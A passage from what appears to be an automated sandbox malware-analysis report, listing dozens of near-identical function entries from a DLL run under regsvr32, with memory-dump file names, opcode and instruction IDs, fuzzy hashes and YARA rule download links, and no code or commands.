                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction ID: 970efa4b12ae811454768047a72053781da3d859117b12240c5018c62c727425
                                                                                                              • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction Fuzzy Hash: 5631A272205B89D6DB658F69E4443AD77A0F38DF88F248125EB4D0B750DF36C196C704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800180E0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb97b135a315b0fe211809f36c6cdad0cb0c5c5859d3d66a78e3183fb93a32d2
                                                                                                              • Instruction ID: 0a380792443759b80787c846ee3bc9aaed0e8e069f867f3fd6054a20c4d7c7e1
                                                                                                              • Opcode Fuzzy Hash: eb97b135a315b0fe211809f36c6cdad0cb0c5c5859d3d66a78e3183fb93a32d2
                                                                                                              • Instruction Fuzzy Hash: 9D318F73204B9896DB658F29D4403AD7BA4F79DB8CF248129EB8C4B751CF36C696DB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180017158 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d5c9b9fee5e2aa2a5f79e0831c0565014a627eaea243611891679579a3bcf34
                                                                                                              • Instruction ID: fb1c72527614da8b6fac59440a5700aa196c3bb9f3e0e3de58fda2b099755341
                                                                                                              • Opcode Fuzzy Hash: 5d5c9b9fee5e2aa2a5f79e0831c0565014a627eaea243611891679579a3bcf34
                                                                                                              • Instruction Fuzzy Hash: 3C315E72304B9486DB618F29D4403AD7BB0F399B8CF248125EB8D4B752DF36C59ACB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001A1A0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6c7f1b1129227a4152f7eda820c4deddf121ae233390d670c7aa572271755ad
                                                                                                              • Instruction ID: 4e5799305e5084541d7159adaab092abd5f203c88e0685a598ad4f6173234d0c
                                                                                                              • Opcode Fuzzy Hash: a6c7f1b1129227a4152f7eda820c4deddf121ae233390d670c7aa572271755ad
                                                                                                              • Instruction Fuzzy Hash: B6319172218B9886EBA28F29D0403AD7BA0E39DF8CF248115EB4C4B751CF36C596CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800191E0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction ID: ae072f0ffc0f6f09233b287154a7bdcb6df09c5a2582897fb6054c608691a18e
                                                                                                              • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction Fuzzy Hash: 0231A072605B88C6EBA18F69E0403ED7BA0F38DB88F248125EB4C4B750CF36C196CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800181E4 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a292be2d75a9594566bcf78c629e301164523910fb1b26a3913015135b1e3331
                                                                                                              • Instruction ID: 22204c7159014ea0372674f9054289992822a3e11217a0e77a77c18a8f017754
                                                                                                              • Opcode Fuzzy Hash: a292be2d75a9594566bcf78c629e301164523910fb1b26a3913015135b1e3331
                                                                                                              • Instruction Fuzzy Hash: D8316172214F8886DBA28F69D0503AD7BA0F79DB8CF248115EB4D4B755CF36C696DB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180017260 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 853e24f902a9ed67a869c5bf24c926cc091a79c378beb971ee3057ec0e5ab4f2
                                                                                                              • Instruction ID: a53a8e1fdd1dc0ace2a3de1e4a6e69079174daec2f8f5491367527e434b0c9a7
                                                                                                              • Opcode Fuzzy Hash: 853e24f902a9ed67a869c5bf24c926cc091a79c378beb971ee3057ec0e5ab4f2
                                                                                                              • Instruction Fuzzy Hash: DA318F72204B8485DB668F29D4403AD7BB0E39DB8CF248125EB9C0B752CF36C296D700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001A2A8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cd20b360deb10576876a1745d7f3ea639713bd980d60ff6c224e2e325fcc08a
                                                                                                              • Instruction ID: 6250d07997e561b7e4747bbf9f02ac3ec4200d64b7f3c780d14ed19c5de0d467
                                                                                                              • Opcode Fuzzy Hash: 4cd20b360deb10576876a1745d7f3ea639713bd980d60ff6c224e2e325fcc08a
                                                                                                              • Instruction Fuzzy Hash: 7531D472218B94C6EBA18F29D0403AD77A0F78DB8CF248115EB9C4B751DF36C696DB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800182E8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9467c077bac1272afc550bc4d2e4584f7144020c6b128b55d4d2ea6cf0fd033
                                                                                                              • Instruction ID: 29d575c279bb5d41915836d3f5ac26d11357c8ae745e24df4180997f29c1f97e
                                                                                                              • Opcode Fuzzy Hash: b9467c077bac1272afc550bc4d2e4584f7144020c6b128b55d4d2ea6cf0fd033
                                                                                                              • Instruction Fuzzy Hash: 66318172204A44C6DBA58F19E0803AD77A0F78DF8CF288115EB9D4B750CF36C696DB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180017368 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9fef88b018869cd1005e9798cd121b10f4c64f4d08c7aa9dcc08cb691373933b
                                                                                                              • Instruction ID: 7aa305b4cc14063472864ce1b6c0d719bfdc8145604ab95b6106e53c59899e40
                                                                                                              • Opcode Fuzzy Hash: 9fef88b018869cd1005e9798cd121b10f4c64f4d08c7aa9dcc08cb691373933b
                                                                                                              • Instruction Fuzzy Hash: 9C317172214B98C6DB658F29E4403AD7BB0F389B8CF648125EB4C4B751DF36C696C704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001A3B4 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bc865175531ecdf879953ceedd51c8433dff099852d131511135a6a4724892ea
                                                                                                              • Instruction ID: 5be07ba218067916cf86360d6e6fdb85136f0dbb7a72fbe1cb2d3bc98ce12563
                                                                                                              • Opcode Fuzzy Hash: bc865175531ecdf879953ceedd51c8433dff099852d131511135a6a4724892ea
                                                                                                              • Instruction Fuzzy Hash: A131A272218B54C6EBA18F29E0443AD77A0F79DB8CF248115EB8C4B751DF36C596C714
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800183F0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b123a22da8cb72ab9fee80376c71c8eef8c1589e8cda340b591775da82d96b15
                                                                                                              • Instruction ID: ebf66986cf93b6d3a44bb6991ec4b191d99863ea110f0b6ca252c40f8db73491
                                                                                                              • Opcode Fuzzy Hash: b123a22da8cb72ab9fee80376c71c8eef8c1589e8cda340b591775da82d96b15
                                                                                                              • Instruction Fuzzy Hash: D0318072614B48C6EBA18F29E0403AD7BA0F79DB8CF248125EB4C4B751CF36C696DB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180017474 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ff210611f35baceed40b755a8155feaec0b3e091df650ec16e6a187f790717c6
                                                                                                              • Instruction ID: 514e0866eb264e5243c65b8c61c68ba0f55c5c9934be27c7a1896d0a928ca928
                                                                                                              • Opcode Fuzzy Hash: ff210611f35baceed40b755a8155feaec0b3e091df650ec16e6a187f790717c6
                                                                                                              • Instruction Fuzzy Hash: DF316F72604B5486EBA58F29E0403AD77B1F388B9CF648125EB8D4B752DF36C596C704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018548 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction ID: 31283c894e7931bdf7b55ae2ec29c5c766b6295552913056d77ea29eeea56888
                                                                                                              • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction Fuzzy Hash: 8B31A272204F98C6DBA18F29D4503AD7BA1F79DB88F648125EB8C4B351CF36C256DB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800175D0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 631278753345c9a109010988ad6e72bd4afe9e9f5e66719719a320f1892f47d2
                                                                                                              • Instruction ID: 58aa26232159bc655de3cca96b5660e8d3a7da668e21d302c0b9c8280e618a9d
                                                                                                              • Opcode Fuzzy Hash: 631278753345c9a109010988ad6e72bd4afe9e9f5e66719719a320f1892f47d2
                                                                                                              • Instruction Fuzzy Hash: 70319172305F9486EB668F29D0403AD7BA0E39DB9CF248115EB8C4B752CF36C596CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018650 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction ID: 2fd4658360d83bf4c47cba2565616edb656173608119819fb52390affacbcccf
                                                                                                              • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction Fuzzy Hash: 8931A272208B88C6EB628F29E0503AD7BA0F79DB8CF248125EB4C4B751CF36C256D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018758 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction ID: e1638ce56725cf949ac8fcfeebe8be8063e5bfa5281331c497428afcea7821a6
                                                                                                              • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction Fuzzy Hash: 8D317172604B88C6DBA5CF29E0803AD77A4F78DB88F648129EB8C4B750DF36C656D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018860 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction ID: 8b7d6655bf3d42be2705683592c265a935ffe8f86e1b0367b3fb17f70fdd5f42
                                                                                                              • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction Fuzzy Hash: EF318272614B88C6DBA58F29D0503AD77A4F78DB8CF688125EB8C4B751CF36C296D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016870 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
